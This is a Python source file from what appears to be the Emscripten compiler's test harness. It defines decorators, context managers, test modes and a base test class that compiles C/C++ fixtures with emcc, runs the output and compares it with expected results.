EMTEST_SKIP_SLOW = os.getenv('EMTEST_SKIP_SLOW')
EMTEST_LACKS_NATIVE_CLANG = os.getenv('EMTEST_LACKS_NATIVE_CLANG')
EMTEST_VERBOSE = int(os.getenv('EMTEST_VERBOSE', '0'))
if EMTEST_VERBOSE:
logging.root.setLevel(logging.DEBUG)
# checks if browser testing is enabled
def has_browser():
return EMTEST_BROWSER != '0'
# Generic decorator that calls a function named 'condition' on the test class and
# skips the test if that function returns true
def skip_if(func, condition, explanation='', negate=False):
assert callable(func)
explanation_str = ' : %s' % explanation if explanation else ''
@wraps(func)
def decorated(self, *args, **kwargs):
choice = self.__getattribute__(condition)()
if negate:
choice = not choice
if choice:
self.skipTest(condition + explanation_str)
func(self, *args, **kwargs)
return decorated
def needs_dlfcn(func):
assert callable(func)
@wraps(func)
def decorated(self):
self.check_dlfcn()
return func(self)
return decorated
def is_slow_test(func):
assert callable(func)
@wraps(func)
def decorated(self, *args, **kwargs):
if EMTEST_SKIP_SLOW:
return self.skipTest('skipping slow tests')
return func(self, *args, **kwargs)
return decorated
def no_wasm_backend(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm_backend', note)
return decorated
def no_fastcomp(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm_backend', note, negate=True)
return decorated
def no_windows(note=''):
assert not callable(note)
if WINDOWS:
return unittest.skip(note)
return lambda f: f
def no_asmjs(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm', note, negate=True)
return decorated
def requires_native_clang(func):
assert callable(func)
def decorated(self, *args, **kwargs):
if EMTEST_LACKS_NATIVE_CLANG:
return self.skipTest('native clang tests are disabled')
return func(self, *args, **kwargs)
return decorated
@contextlib.contextmanager
def env_modify(updates):
"""A context manager that updates os.environ."""
# This could also be done with mock.patch.dict() but taking a dependency
# on the mock library is probably not worth the benefit.
old_env = os.environ.copy()
print("env_modify: " + str(updates))
  # Setting a value to None means clear the environment variable
clears = [key for key, value in updates.items() if value is None]
updates = {key: value for key, value in updates.items() if value is not None}
os.environ.update(updates)
for key in clears:
if key in os.environ:
del os.environ[key]
try:
yield
finally:
os.environ.clear()
os.environ.update(old_env)
# Decorator version of env_modify
def with_env_modify(updates):
def decorated(f):
def modified(self):
with env_modify(updates):
return f(self)
return modified
return decorated
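# (Added) Example use of the decorator above; the variable names are illustrative:
#   @with_env_modify({'EMCC_DEBUG': '1', 'EMCC_CORES': None})
#   def test_something(self):
#       ...  # runs with EMCC_DEBUG set and EMCC_CORES removed from the environment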
@contextlib.contextmanager
def chdir(dir):
"""A context manager that performs actions in the given directory."""
orig_cwd = os.getcwd()
os.chdir(dir)
try:
yield
finally:
os.chdir(orig_cwd)
@contextlib.contextmanager
def js_engines_modify(replacements):
"""A context manager that updates shared.JS_ENGINES."""
original = shared.JS_ENGINES
shared.JS_ENGINES = replacements
try:
yield
finally:
shared.JS_ENGINES = original
@contextlib.contextmanager
def wasm_engines_modify(replacements):
"""A context manager that updates shared.WASM_ENGINES."""
original = shared.WASM_ENGINES
shared.WASM_ENGINES = replacements
try:
yield
finally:
shared.WASM_ENGINES = original
def ensure_dir(dirname):
if not os.path.isdir(dirname):
os.makedirs(dirname)
def limit_size(string, maxbytes=800000 * 20, maxlines=100000):
lines = string.splitlines()
if len(lines) > maxlines:
lines = lines[0:maxlines // 2] + ['[..]'] + lines[-maxlines // 2:]
string = '\n'.join(lines)
if len(string) > maxbytes:
string = string[0:maxbytes // 2] + '\n[..]\n' + string[-maxbytes // 2:]
return string
def create_test_file(name, contents, binary=False):
assert not os.path.isabs(name)
mode = 'wb' if binary else 'w'
with open(name, mode) as f:
f.write(contents)
# The core test modes
core_test_modes = [
'wasm0',
'wasm1',
'wasm2',
'wasm3',
'wasms',
'wasmz',
'strict'
]
if Settings.WASM_BACKEND:
core_test_modes += [
'wasm2js0',
'wasm2js1',
'wasm2js2',
'wasm2js3',
'wasm2jss',
'wasm2jsz',
]
else:
core_test_modes += [
'asm0',
'asm2',
'asm3',
'asm2g',
]
# The default core test mode, used when none is specified
default_core_test_mode = 'wasm0'
# The non-core test modes
non_core_test_modes = [
'other',
'browser',
'sanity',
'sockets',
'interactive',
'benchmark',
]
if Settings.WASM_BACKEND:
non_core_test_modes += [
'asan',
'lsan',
'wasm2ss',
]
def parameterized(parameters):
"""
Mark a test as parameterized.
Usage:
@parameterized({
'subtest1': (1, 2, 3),
'subtest2': (4, 5, 6),
})
def test_something(self, a, b, c):
... # actual test body
This is equivalent to defining two tests:
def test_something_subtest1(self):
# runs test_something(1, 2, 3)
def test_something_subtest2(self):
# runs test_something(4, 5, 6)
"""
def decorator(func):
func._parameterize = parameters
return func
return decorator
class RunnerMeta(type):
@classmethod
def make_test(mcs, name, func, suffix, args):
"""
This is a helper function to create new test functions for each parameterized form.
:param name: the original name of the function
:param func: the original function that we are parameterizing
:param suffix: the suffix to append to the name of the function for this parameterization
:param args: the positional arguments to pass to the original function for this parameterization
:returns: a tuple of (new_function_name, new_function_object)
"""
# Create the new test function. It calls the original function with the specified args.
# We use @functools.wraps to copy over all the function attributes.
@wraps(func)
def resulting_test(self):
return func(self, *args)
# Add suffix to the function name so that it displays correctly.
if suffix:
resulting_test.__name__ = '%s_%s' % (name, suffix)
else:
resulting_test.__name__ = name
# On python 3, functions have __qualname__ as well. This is a full dot-separated path to the function.
# We add the suffix to it as well.
if hasattr(func, '__qualname__'):
resulting_test.__qualname__ = '%s_%s' % (func.__qualname__, suffix)
return resulting_test.__name__, resulting_test
def __new__(mcs, name, bases, attrs):
# This metaclass expands parameterized methods from `attrs` into separate ones in `new_attrs`.
new_attrs = {}
for attr_name, value in attrs.items():
# Check if a member of the new class has _parameterize, the tag inserted by @parameterized.
if hasattr(value, '_parameterize'):
# If it does, we extract the parameterization information, build new test functions.
for suffix, args in value._parameterize.items():
new_name, func = mcs.make_test(attr_name, value, suffix, args)
assert new_name not in new_attrs, 'Duplicate attribute name generated when parameterizing %s' % attr_name
new_attrs[new_name] = func
else:
# If not, we just copy it over to new_attrs verbatim.
assert attr_name not in new_attrs, '%s collided with an attribute from parameterization' % attr_name
new_attrs[attr_name] = value
# We invoke type, the default metaclass, to actually create the new class, with new_attrs.
return type.__new__(mcs, name, bases, new_attrs)
# This is a hack to make the metaclass work on both python 2 and python 3.
#
# On python 3, the code should be:
# class RunnerCore(unittest.TestCase, metaclass=RunnerMeta):
# ...
#
# On python 2, the code should be:
# class RunnerCore(unittest.TestCase):
# __metaclass__ = RunnerMeta
# ...
#
# To be compatible with both python 2 and python 3, we create a class by directly invoking the
# metaclass, which is done in the same way on both python 2 and 3, and inherit from it,
# since a class inherits the metaclass by default.
class RunnerCore(RunnerMeta('TestCase', (unittest.TestCase,), {})):
# default temporary directory settings. set_temp_dir may be called later to
# override these
temp_dir = TEMP_DIR
canonical_temp_dir = get_canonical_temp_dir(TEMP_DIR)
# This avoids cluttering the test runner output, which is stderr too, with compiler warnings etc.
# Change this to None to get stderr reporting, for debugging purposes
stderr_redirect = STDOUT
def is_wasm(self):
return self.get_setting('WASM') != 0
def is_wasm_backend(self):
return self.get_setting('WASM_BACKEND')
def check_dlfcn(self):
if self.get_setting('ALLOW_MEMORY_GROWTH') == 1 and not self.is_wasm():
self.skipTest('no dlfcn with memory growth (without wasm)')
if self.get_setting('WASM_BACKEND') and not self.get_setting('WASM'):
self.skipTest('no dynamic library support in wasm2js yet')
if '-fsanitize=address' in self.emcc_args:
self.skipTest('no dynamic library support in asan yet')
def uses_memory_init_file(self):
if self.get_setting('SIDE_MODULE') or \
(self.get_setting('WASM') and not self.get_setting('WASM2JS')):
return False
elif '--memory-init-file' in self.emcc_args:
return int(self.emcc_args[self.emcc_args.index('--memory-init-file') + 1])
else:
# side modules handle memory differently; binaryen puts the memory in the wasm module
opt_supports = any(opt in self.emcc_args for opt in ('-O2', '-O3', '-Os', '-Oz'))
return opt_supports
def set_temp_dir(self, temp_dir):
self.temp_dir = temp_dir
self.canonical_temp_dir = get_canonical_temp_dir(self.temp_dir)
# Explicitly set dedicated temporary directory for parallel tests
os.environ['EMCC_TEMP_DIR'] = self.temp_dir
@classmethod
def setUpClass(cls):
super(RunnerCore, cls).setUpClass()
print('(checking sanity from test runner)') # do this after we set env stuff
shared.check_sanity(force=True)
def setUp(self):
super(RunnerCore, self).setUp()
self.settings_mods = {}
self.emcc_args = ['-Werror']
self.env = {}
self.temp_files_before_run = []
if not Settings.WASM_BACKEND:
os.environ['EMCC_ALLOW_FASTCOMP'] = '1'
if EMTEST_DETECT_TEMPFILE_LEAKS:
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, filename)))
self.banned_js_engines = []
self.use_all_engines = EMTEST_ALL_ENGINES
if EMTEST_SAVE_DIR:
self.working_dir = os.path.join(self.temp_dir, 'emscripten_test')
if os.path.exists(self.working_dir):
if EMTEST_SAVE_DIR == 2:
print('Not clearing existing test directory')
else:
print('Clearing existing test directory')
          # Even when EMTEST_SAVE_DIR we still try to start with an empty directory as many tests
# expect this. EMTEST_SAVE_DIR=2 can be used to keep the old contents for the new test
# run. This can be useful when iterating on a given test with extra files you want to keep
# around in the output directory.
delete_contents(self.working_dir)
else:
print('Creating new test output directory')
ensure_dir(self.working_dir)
else:
self.working_dir = tempfile.mkdtemp(prefix='emscripten_test_' + self.__class__.__name__ + '_', dir=self.temp_dir)
os.chdir(self.working_dir)
if not EMTEST_SAVE_DIR:
self.has_prev_ll = False
for temp_file in os.listdir(TEMP_DIR):
if temp_file.endswith('.ll'):
self.has_prev_ll = True
def tearDown(self):
if not EMTEST_SAVE_DIR:
# rmtree() fails on Windows if the current working directory is inside the tree.
os.chdir(os.path.dirname(self.get_dir()))
try_delete(self.get_dir())
if EMTEST_DETECT_TEMPFILE_LEAKS and not os.environ.get('EMCC_DEBUG'):
temp_files_after_run = []
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, filename)))
# Our leak detection will pick up *any* new temp files in the temp dir.
# They may not be due to us, but e.g. the browser when running browser
# tests. Until we figure out a proper solution, ignore some temp file
# names that we see on our CI infrastructure.
ignorable_file_prefixes = [
'/tmp/tmpaddon',
'/tmp/circleci-no-output-timeout',
'/tmp/wasmer'
]
left_over_files = set(temp_files_after_run) - set(self.temp_files_before_run)
left_over_files = [f for f in left_over_files if not any([f.startswith(prefix) for prefix in ignorable_file_prefixes])]
if len(left_over_files):
print('ERROR: After running test, there are ' + str(len(left_over_files)) + ' new temporary files/directories left behind:', file=sys.stderr)
for f in left_over_files:
print('leaked file: ' + f, file=sys.stderr)
self.fail('Test leaked ' + str(len(left_over_files)) + ' temporary files!')
def get_setting(self, key):
if key in self.settings_mods:
return self.settings_mods[key]
return Settings[key]
def set_setting(self, key, value=1):
if value is None:
self.clear_setting(key)
self.settings_mods[key] = value
def has_changed_setting(self, key):
return key in self.settings_mods
def clear_setting(self, key):
self.settings_mods.pop(key, None)
def serialize_settings(self):
ret = []
for key, value in self.settings_mods.items():
if value == 1:
ret += ['-s', key]
else:
ret += ['-s', '{}={}'.format(key, json.dumps(value))]
return ret
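  # (Added) For example, settings_mods = {'WASM': 1, 'EXIT_RUNTIME': 0} serializes
  # to ['-s', 'WASM', '-s', 'EXIT_RUNTIME=0'] with the logic above (illustrative).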
def get_dir(self):
return self.working_dir
def in_dir(self, *pathelems):
return os.path.join(self.get_dir(), *pathelems)
def add_pre_run(self, code):
create_test_file('prerun.js', 'Module.preRun = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'prerun.js']
def add_post_run(self, code):
create_test_file('postrun.js', 'Module.postRun = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'postrun.js']
def add_on_exit(self, code):
create_test_file('onexit.js', 'Module.onExit = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'onexit.js']
def prep_ll_file(self, output_file, input_file, force_recompile=False, build_ll_hook=None):
# force_recompile = force_recompile or os.path.getsize(filename + '.ll') > 50000
# If the file is big, recompile just to get ll_opts
# Recompiling just for dfe in ll_opts is too costly
def fix_target(ll_filename):
if LLVM_TARGET == ASM_JS_TARGET:
return
with open(ll_filename) as f:
contents = f.read()
if LLVM_TARGET in contents:
return
asmjs_layout = "e-p:32:32-i64:64-v128:32:128-n32-S128"
wasm_layout = "e-m:e-p:32:32-i64:64-n32:64-S128"
assert(ASM_JS_TARGET in contents)
assert(asmjs_layout in contents)
contents = contents.replace(asmjs_layout, wasm_layout)
contents = contents.replace(ASM_JS_TARGET, WASM_TARGET)
with open(ll_filename, 'w') as f:
f.write(contents)
output_obj = output_file + '.o'
output_ll = output_file + '.ll'
if force_recompile or build_ll_hook:
if input_file.endswith(('.bc', '.o')):
if input_file != output_obj:
shutil.copy(input_file, output_obj)
building.llvm_dis(output_obj, output_ll)
else:
shutil.copy(input_file, output_ll)
fix_target(output_ll)
if build_ll_hook:
need_post = build_ll_hook(output_file)
building.llvm_as(output_ll, output_obj)
shutil.move(output_ll, output_ll + '.pre') # for comparisons later
building.llvm_dis(output_obj, output_ll)
if build_ll_hook and need_post:
build_ll_hook(output_file)
building.llvm_as(output_ll, output_obj)
shutil.move(output_ll, output_ll + '.post') # for comparisons later
building.llvm_dis(output_obj, output_ll)
building.llvm_as(output_ll, output_obj)
else:
if input_file.endswith('.ll'):
safe_copy(input_file, output_ll)
fix_target(output_ll)
building.llvm_as(output_ll, output_obj)
else:
safe_copy(input_file, output_obj)
return output_obj
# returns the full list of arguments to pass to emcc
# param @main_file whether this is the main file of the test. some arguments
# (like --pre-js) do not need to be passed when building
# libraries, for example
def get_emcc_args(self, main_file=False):
args = self.serialize_settings() + self.emcc_args
if not main_file:
for i, arg in enumerate(args):
if arg in ('--pre-js', '--post-js'):
args[i] = None
args[i + 1] = None
args = [arg for arg in args if arg is not None]
return args
# Build JavaScript code from source code
def build(self, src, dirname, filename, main_file=None,
additional_files=[], libraries=[], includes=[], build_ll_hook=None,
post_build=None, js_outfile=True):
# Copy over necessary files for compiling the source
if main_file is None:
with open(filename, 'w') as f:
f.write(src)
final_additional_files = []
for f in additional_files:
final_additional_files.append(os.path.join(dirname, os.path.basename(f)))
shutil.copyfile(f, final_additional_files[-1])
additional_files = final_additional_files
else:
# copy whole directory, and use a specific main .cpp file
# (rmtree() fails on Windows if the current working directory is inside the tree.)
if os.getcwd().startswith(os.path.abspath(dirname)):
os.chdir(os.path.join(dirname, '..'))
shutil.rmtree(dirname)
shutil.copytree(src, dirname)
shutil.move(os.path.join(dirname, main_file), filename)
# the additional files were copied; alter additional_files to point to their full paths now
additional_files = [os.path.join(dirname, f) for f in additional_files]
os.chdir(self.get_dir())
suffix = '.o.js' if js_outfile else '.o.wasm'
all_sources = [filename] + additional_files
if any(os.path.splitext(s)[1] in ('.cc', '.cxx', '.cpp') for s in all_sources):
compiler = EMXX
else:
compiler = EMCC
if build_ll_hook:
# "slow", old path: build to bc, then build to JS
# C++ => LLVM binary
for f in all_sources:
try:
# Make sure we notice if compilation steps failed
os.remove(f + '.o')
except OSError:
pass
args = [compiler] + self.get_emcc_args(main_file=True) + \
['-I' + dirname, '-I' + os.path.join(dirname, 'include')] + \
['-I' + include for include in includes] + \
['-c', f, '-o', f + '.o']
self.run_process(args, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(f + '.o')
# Link all files
object_file = filename + '.o'
if len(additional_files) + len(libraries):
shutil.move(object_file, object_file + '.alone')
inputs = [object_file + '.alone'] + [f + '.o' for f in additional_files] + libraries
building.link_to_object(inputs, object_file)
if not os.path.exists(object_file):
print("Failed to link LLVM binaries:\n\n", object_file)
self.fail("Linkage error")
# Finalize
self.prep_ll_file(filename, object_file, build_ll_hook=build_ll_hook)
# BC => JS
building.emcc(object_file, self.get_emcc_args(main_file=True), object_file + '.js')
else:
# "fast", new path: just call emcc and go straight to JS
all_files = all_sources + libraries
args = [compiler] + self.get_emcc_args(main_file=True) + \
['-I' + dirname, '-I' + os.path.join(dirname, 'include')] + \
['-I' + include for include in includes] + \
all_files + ['-o', filename + suffix]
self.run_process(args, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(filename + suffix)
if post_build:
post_build(filename + suffix)
if js_outfile and self.uses_memory_init_file():
src = open(filename + suffix).read()
# side memory init file, or an empty one in the js
assert ('/* memory initializer */' not in src) or ('/* memory initializer */ allocate([]' in src)
def get_func(self, src, name):
start = src.index('function ' + name + '(')
t = start
n = 0
while True:
if src[t] == '{':
n += 1
elif src[t] == '}':
n -= 1
if n == 0:
return src[start:t + 1]
t += 1
assert t < len(src)
def count_funcs(self, javascript_file):
num_funcs = 0
start_tok = "// EMSCRIPTEN_START_FUNCS"
end_tok = "// EMSCRIPTEN_END_FUNCS"
start_off = 0
end_off = 0
with open(javascript_file, 'rt') as f:
blob = "".join(f.readlines())
start_off = blob.find(start_tok) + len(start_tok)
end_off = blob.find(end_tok)
asm_chunk = blob[start_off:end_off]
num_funcs = asm_chunk.count('function ')
return num_funcs
def count_wasm_contents(self, wasm_binary, what):
out = self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), wasm_binary, '--metrics'], stdout=PIPE).stdout
# output is something like
# [?] : 125
for line in out.splitlines():
if '[' + what + ']' in line:
ret = line.split(':')[1].strip()
return int(ret)
self.fail('Failed to find [%s] in wasm-opt output' % what)
def get_wasm_text(self, wasm_binary):
return self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-dis'), wasm_binary], stdout=PIPE).stdout
def is_exported_in_wasm(self, name, wasm):
wat = self.get_wasm_text(wasm)
return ('(export "%s"' % name) in wat
def run_js(self, filename, engine=None, args=[], output_nicerizer=None, assert_returncode=0):
# use files, as PIPE can get too full and hang us
stdout = self.in_dir('stdout')
stderr = self.in_dir('stderr')
error = None
if EMTEST_VERBOSE:
print("Running '%s' under '%s'" % (filename, engine))
try:
jsrun.run_js(filename, engine, args,
stdout=open(stdout, 'w'),
stderr=open(stderr, 'w'),
assert_returncode=assert_returncode)
except subprocess.CalledProcessError as e:
error = e
# Make sure that we produced proper line endings to the .js file we are about to run.
if not filename.endswith('.wasm'):
self.assertEqual(line_endings.check_line_endings(filename), 0)
out = open(stdout, 'r').read()
err = open(stderr, 'r').read()
if output_nicerizer:
ret = output_nicerizer(out, err)
else:
ret = out + err
if error or EMTEST_VERBOSE:
print('-- begin program output --')
print(ret, end='')
print('-- end program output --')
if error:
if assert_returncode == NON_ZERO:
self.fail('JS subprocess unexpectedly succeeded (%s): Output:\n%s' % (error.cmd, ret))
else:
self.fail('JS subprocess failed (%s): %s. Output:\n%s' % (error.cmd, error.returncode, ret))
# We should pass all strict mode checks
self.assertNotContained('strict warning:', ret)
return ret
def assertExists(self, filename, msg=None):
if not msg:
msg = 'Expected file not found: ' + filename
self.assertTrue(os.path.exists(filename), msg)
def assertNotExists(self, filename, msg=None):
if not msg:
msg = 'Unexpected file exists: ' + filename
self.assertFalse(os.path.exists(filename), msg)
# Tests that the given two paths are identical, modulo path delimiters. E.g. "C:/foo" is equal to "C:\foo".
def assertPathsIdentical(self, path1, path2):
path1 = path1.replace('\\', '/')
path2 = path2.replace('\\', '/')
return self.assertIdentical(path1, path2)
# Tests that the given two multiline text content are identical, modulo line
# ending differences (\r\n on Windows, \n on Unix).
def assertTextDataIdentical(self, text1, text2, msg=None,
fromfile='expected', tofile='actual'):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertIdentical(text1, text2, msg, fromfile, tofile)
def assertIdentical(self, values, y, msg=None,
fromfile='expected', tofile='actual'):
if type(values) not in (list, tuple):
values = [values]
for x in values:
if x == y:
return # success
diff_lines = difflib.unified_diff(x.splitlines(), y.splitlines(),
fromfile=fromfile, tofile=tofile)
diff = ''.join([a.rstrip() + '\n' for a in diff_lines])
if EMTEST_VERBOSE:
print("Expected to have '%s' == '%s'" % (limit_size(values[0]), limit_size(y)))
fail_message = 'Unexpected difference:\n' + limit_size(diff)
if not EMTEST_VERBOSE:
fail_message += '\nFor full output run with EMTEST_VERBOSE=1.'
if msg:
fail_message += '\n' + msg
self.fail(fail_message)
def assertIdenticalUrlEncoded(self, expected, actual, **kwargs):
"""URL decodes the `actual` parameter before checking for equality."""
self.assertIdentical(expected, unquote(actual), **kwargs)
def assertTextDataContained(self, text1, text2):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertContained(text1, text2)
def assertContained(self, values, string, additional_info=''):
if type(values) not in [list, tuple]:
values = [values]
values = list(map(asstr, values))
if callable(string):
string = string()
if not any(v in string for v in values):
diff = difflib.unified_diff(values[0].split('\n'), string.split('\n'), fromfile='expected', tofile='actual')
diff = ''.join(a.rstrip() + '\n' for a in diff)
self.fail("Expected to find '%s' in '%s', diff:\n\n%s\n%s" % (
limit_size(values[0]), limit_size(string), limit_size(diff),
additional_info
))
def assertNotContained(self, value, string):
if callable(value):
value = value() # lazy loading
if callable(string):
string = string()
if value in string:
self.fail("Expected to NOT find '%s' in '%s', diff:\n\n%s" % (
limit_size(value), limit_size(string),
limit_size(''.join([a.rstrip() + '\n' for a in difflib.unified_diff(value.split('\n'), string.split('\n'), fromfile='expected', tofile='actual')]))
))
def assertContainedIf(self, value, string, condition):
if condition:
self.assertContained(value, string)
else:
self.assertNotContained(value, string)
def assertBinaryEqual(self, file1, file2):
self.assertEqual(os.path.getsize(file1),
os.path.getsize(file2))
self.assertEqual(open(file1, 'rb').read(),
open(file2, 'rb').read())
library_cache = {}
def get_build_dir(self):
ret = os.path.join(self.get_dir(), 'building')
ensure_dir(ret)
return ret
def get_library(self, name, generated_libs, configure=['sh', './configure'],
configure_args=[], make=['make'], make_args=None,
env_init={}, cache_name_extra='', native=False):
if make_args is None:
make_args = ['-j', str(building.get_num_cores())]
build_dir = self.get_build_dir()
output_dir = self.get_dir()
emcc_args = self.get_emcc_args()
hash_input = (str(emcc_args) + ' $ ' + str(env_init)).encode('utf-8')
cache_name = name + ','.join([opt for opt in emcc_args if len(opt) < 7]) + '_' + hashlib.md5(hash_input).hexdigest() + cache_name_extra
valid_chars = "_%s%s" % (string.ascii_letters, string.digits)
cache_name = ''.join([(c if c in valid_chars else '_') for c in cache_name])
if self.library_cache.get(cache_name):
print('<load %s from cache> ' % cache_name, file=sys.stderr)
generated_libs = []
for basename, contents in self.library_cache[cache_name]:
bc_file = os.path.join(build_dir, cache_name + '_' + basename)
with open(bc_file, 'wb') as f:
f.write(contents)
generated_libs.append(bc_file)
return generated_libs
print('<building and saving %s into cache> ' % cache_name, file=sys.stderr)
return build_library(name, build_dir, output_dir, generated_libs, configure,
configure_args, make, make_args, self.library_cache,
cache_name, env_init=env_init, native=native, cflags=self.get_emcc_args())
def clear(self):
for name in os.listdir(self.get_dir()):
try_delete(os.path.join(self.get_dir(), name))
if EMSCRIPTEN_TEMP_DIR:
for name in os.listdir(EMSCRIPTEN_TEMP_DIR):
try_delete(os.path.join(EMSCRIPTEN_TEMP_DIR, name))
def run_process(self, cmd, check=True, **args):
# Wrapper around shared.run_process. This is desirable so that the tests
# can fail (in the unittest sense) rather than error'ing.
    # In the long run it would be nice to completely remove the dependency on
# core emscripten code (shared.py) here.
try:
return shared.run_process(cmd, check=check, **args)
except subprocess.CalledProcessError as e:
if check and e.returncode != 0:
self.fail('subprocess exited with non-zero return code(%d): `%s`' %
(e.returncode, shared.shlex_join(cmd)))
# Shared test code between main suite and others
def expect_fail(self, cmd, **args):
"""Run a subprocess and assert that it returns non-zero.
Return the stderr of the subprocess.
"""
proc = self.run_process(cmd, check=False, stderr=PIPE, **args)
self.assertNotEqual(proc.returncode, 0, 'subprocess unexpectedly succeeded. stderr:\n' + proc.stderr)
# When we check for failure we expect a user-visible error, not a traceback.
    # However, on Windows a Python traceback can happen randomly sometimes,
# due to "Access is denied" https://github.com/emscripten-core/emscripten/issues/718
if not WINDOWS or 'Access is denied' not in proc.stderr:
self.assertNotContained('Traceback', proc.stderr)
return proc.stderr
def setup_runtimelink_test(self):
create_test_file('header.h', r'''
struct point
{
int x, y;
};
''')
supp = r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x + p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
'''
create_test_file('supp.cpp', supp)
main = r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
#ifdef BROWSER
REPORT_RESULT(suppInt);
#endif
return 0;
}
'''
return (main, supp)
  # exercise the dynamic linker.
#
# test that linking to shared library B, which is linked to A, loads A as well.
# main is also linked to C, which is also linked to A. A is loaded/initialized only once.
#
# B
# main < > A
# C
#
# this test is used by both test_core and test_browser.
  # when run under the browser it exercises how the dynamic linker handles concurrency
# - because B and C are loaded in parallel.
def _test_dylink_dso_needed(self, do_run):
create_test_file('liba.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
static const char *afunc_prev;
extern "C" {
EMSCRIPTEN_KEEPALIVE void afunc(const char *s);
}
void afunc(const char *s) {
printf("a: %s (prev: %s)\n", s, afunc_prev);
afunc_prev = s;
}
struct ainit {
ainit() {
puts("a: loaded");
}
};
static ainit _;
''')
create_test_file('libb.cpp', r'''
#include <emscripten.h>
extern "C" {
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void bfunc();
}
void bfunc() {
afunc("b");
}
''')
create_test_file('libc.cpp', r'''
#include <emscripten.h>
extern "C" {
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void cfunc();
}
void cfunc() {
afunc("c");
}
''')
# _test_dylink_dso_needed can be potentially called several times by a test.
# reset dylink-related options first.
self.clear_setting('MAIN_MODULE')
self.clear_setting('SIDE_MODULE')
self.clear_setting('RUNTIME_LINKED_LIBS')
# XXX in wasm each lib load currently takes 5MB; default INITIAL_MEMORY=16MB is thus not enough
self.set_setting('INITIAL_MEMORY', 32 * 1024 * 1024)
so = '.wasm' if self.is_wasm() else '.js'
def ccshared(src, linkto=[]):
cmdv = [EMCC, src, '-o', os.path.splitext(src)[0] + so] + self.get_emcc_args()
cmdv += ['-s', 'SIDE_MODULE=1', '-s', 'RUNTIME_LINKED_LIBS=' + str(linkto)]
self.run_process(cmdv)
ccshared('liba.cpp')
ccshared('libb.cpp', ['liba' + so])
ccshared('libc.cpp', ['liba' + so])
self.set_setting('MAIN_MODULE', 1)
self.set_setting('RUNTIME_LINKED_LIBS', ['libb' + so, 'libc' + so])
do_run(r'''
extern "C" {
void bfunc();
void cfunc();
}
int test_main() {
bfunc();
cfunc();
return 0;
}
''',
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
self.set_setting('RUNTIME_LINKED_LIBS', [])
for libname in ['liba', 'libb', 'libc']:
self.emcc_args += ['--embed-file', libname + so]
do_run(r'''
#include <assert.h>
#include <dlfcn.h>
#include <stddef.h>
int test_main() {
void *bdso, *cdso;
void (*bfunc)(), (*cfunc)();
// FIXME for RTLD_LOCAL binding symbols to loaded lib is not currently working
bdso = dlopen("libb%(so)s", RTLD_GLOBAL);
assert(bdso != NULL);
cdso = dlopen("libc%(so)s", RTLD_GLOBAL);
assert(cdso != NULL);
bfunc = (void (*)())dlsym(bdso, "bfunc");
assert(bfunc != NULL);
cfunc = (void (*)())dlsym(cdso, "cfunc");
assert(cfunc != NULL);
bfunc();
cfunc();
return 0;
}
''' % locals(),
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
def filtered_js_engines(self, js_engines=None):
if js_engines is None:
js_engines = shared.JS_ENGINES
for engine in js_engines:
assert type(engine) == list
for engine in self.banned_js_engines:
assert type(engine) in (list, type(None))
banned = [b[0] for b in self.banned_js_engines if b]
return [engine for engine in js_engines if engine and engine[0] not in banned]
def do_run_from_file(self, src, expected_output, *args, **kwargs):
if 'force_c' not in kwargs and os.path.splitext(src)[1] == '.c':
kwargs['force_c'] = True
logger.debug('do_run_from_file: %s' % src)
self.do_run(open(src).read(), open(expected_output).read(), *args, **kwargs)
def do_run_in_out_file_test(self, *path, **kwargs):
test_path = path_from_root(*path)
def find_files(*ext_list):
ret = None
count = 0
for ext in ext_list:
if os.path.isfile(test_path + ext):
ret = test_path + ext
count += 1
assert count > 0, ("No file found at {} with extension {}"
.format(test_path, ext_list))
assert count <= 1, ("Test file {} found with multiple valid extensions {}"
.format(test_path, ext_list))
return ret
src = find_files('.c', '.cpp')
output = find_files('.out', '.txt')
self.do_run_from_file(src, output, **kwargs)
## Does a complete test - builds, runs, checks output, etc.
def do_run(self, src, expected_output, args=[], output_nicerizer=None,
no_build=False, main_file=None, additional_files=[],
js_engines=None, post_build=None, basename='src.cpp', libraries=[],
includes=[], force_c=False, build_ll_hook=None,
assert_returncode=0, assert_identical=False, assert_all=False,
check_for_error=True):
    if force_c or (main_file is not None and main_file[-2:] == '.c'):
basename = 'src.c'
if no_build:
if src:
js_file = src
else:
js_file = basename + '.o.js'
else:
dirname = self.get_dir()
filename = os.path.join(dirname, basename)
self.build(src, dirname, filename, main_file=main_file,
additional_files=additional_files, libraries=libraries,
includes=includes,
build_ll_hook=build_ll_hook, post_build=post_build)
js_file = filename + '.o.js'
self.assertExists(js_file)
engines = self.filtered_js_engines(js_engines)
